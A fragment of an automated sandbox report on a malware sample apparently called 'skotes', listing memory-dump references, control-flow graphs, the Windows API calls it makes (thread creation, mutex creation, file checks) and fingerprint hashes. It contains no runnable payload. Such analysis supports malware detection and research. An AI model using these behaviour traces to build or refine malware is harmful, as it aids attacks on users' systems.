                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InformationTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 565725191-239921721
                                                                                                                                                                                                                                              • Opcode ID: 86f807a985a56dc7c24f653f5e3449580b9239ea129c2dbc9a194fa266d6df7e
                                                                                                                                                                                                                                              • Instruction ID: 445a1dbec245e46176d059ce4a9c80f5c7d653335d10e9d8a2c855645fb3f5d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86f807a985a56dc7c24f653f5e3449580b9239ea129c2dbc9a194fa266d6df7e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B51EC76900215BBDB10EF65DC41AEE77B8EF46320F204569E520E31D1E7709E91FB90

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2494 bd7590-bd75e1 Sleep 2495 bd7661-bd76d7 call be80c0 * 3 CreateThread Sleep 2494->2495 2496 bd75e3-bd75f7 call bed111 2494->2496 2510 bd76d9-bd76e5 2495->2510 2511 bd7705-bd771d 2495->2511 2496->2495 2502 bd75f9-bd765e call bed64e call bed0c7 2496->2502 2502->2495 2512 bd76fb-bd7702 call bed663 2510->2512 2513 bd76e7-bd76f5 2510->2513 2514 bd771f-bd772b 2511->2514 2515 bd7747-bd775f 2511->2515 2512->2511 2513->2512 2518 bd779b-bd77a0 call c06c6a 2513->2518 2520 bd773d-bd7744 call bed663 2514->2520 2521 bd772d-bd773b 2514->2521 2516 bd7789-bd779a 2515->2516 2517 bd7761-bd776d 2515->2517 2523 bd777f-bd7786 call bed663 2517->2523 2524 bd776f-bd777d 2517->2524 2520->2515 2521->2518 2521->2520 2523->2516 2524->2518 2524->2523
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,845AEA34,?,00000000,00C19138,000000FF), ref: 00BD75CC
                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00BD7430,00C38638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00BD76BF
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BD76C9
                                                                                                                                                                                                                                                • Part of subcall function 00BED0C7: RtlWakeAllConditionVariable.NTDLL ref: 00BED17B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 79123409-0
                                                                                                                                                                                                                                              • Opcode ID: c5d565c718e806434c5e051ca0dd8099513ee49f156bf4883ba69fa35afb3e1d
                                                                                                                                                                                                                                              • Instruction ID: 692e85b2ac24bb6d6749f6f5b5f51305b778bd03099421d26ce11343a5e134e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5d565c718e806434c5e051ca0dd8099513ee49f156bf4883ba69fa35afb3e1d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C51E170260744AFEB14CF28CC86B8C7BB1EB05304F50466AF815973E1EBBAD9848B91

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2531 c06fb4-c06fe9 GetFileType 2532 c070a1-c070a4 2531->2532 2533 c06fef-c06ffa 2531->2533 2536 c070a6-c070a9 2532->2536 2537 c070cd-c070f5 2532->2537 2534 c0701c-c07038 call c040f0 GetFileInformationByHandle 2533->2534 2535 c06ffc-c0700d call c0732a 2533->2535 2546 c070be-c070cb call c075c0 2534->2546 2548 c0703e-c07080 call c0727c call c07124 * 3 2534->2548 2551 c07013-c0701a 2535->2551 2552 c070ba-c070bc 2535->2552 2536->2537 2542 c070ab-c070ad 2536->2542 2538 c07112-c07114 2537->2538 2539 c070f7-c0710a 2537->2539 2544 c07115-c07123 call becff1 2538->2544 2539->2538 2558 c0710c-c0710f 2539->2558 2542->2546 2547 c070af-c070b4 call c075f6 2542->2547 2546->2552 2547->2552 2567 c07085-c0709d call c07249 2548->2567 2551->2534 2552->2544 2558->2538 2567->2538 2570 c0709f 2567->2570 2570->2552
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00C06EE6), ref: 00C06FD6
                                                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 00C07030
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00C070C5
                                                                                                                                                                                                                                                • Part of subcall function 00C0732A: __dosmaperr.LIBCMT ref: 00C0735F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2531987475-0
                                                                                                                                                                                                                                              • Opcode ID: 422db4ac7a84180ba7a817317f269ba51fcc027dc89da8de123669208cc180c6
                                                                                                                                                                                                                                              • Instruction ID: ecbba06084ee156f89713b9d976eb48bfa092af86520bbd6b88c68cafc955d2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422db4ac7a84180ba7a817317f269ba51fcc027dc89da8de123669208cc180c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F418D71D04244ABDB28EFB5DC459AFBBF9EF88300B104A2DF956D3290E630A945DB21
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BD9BA8
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
